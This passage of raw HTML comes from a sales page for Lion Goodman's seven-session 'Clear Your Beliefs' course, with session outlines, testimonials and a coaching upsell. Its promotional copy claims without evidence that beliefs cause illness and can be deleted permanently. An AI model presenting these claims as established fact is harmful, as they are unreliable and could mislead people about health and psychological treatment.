with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the 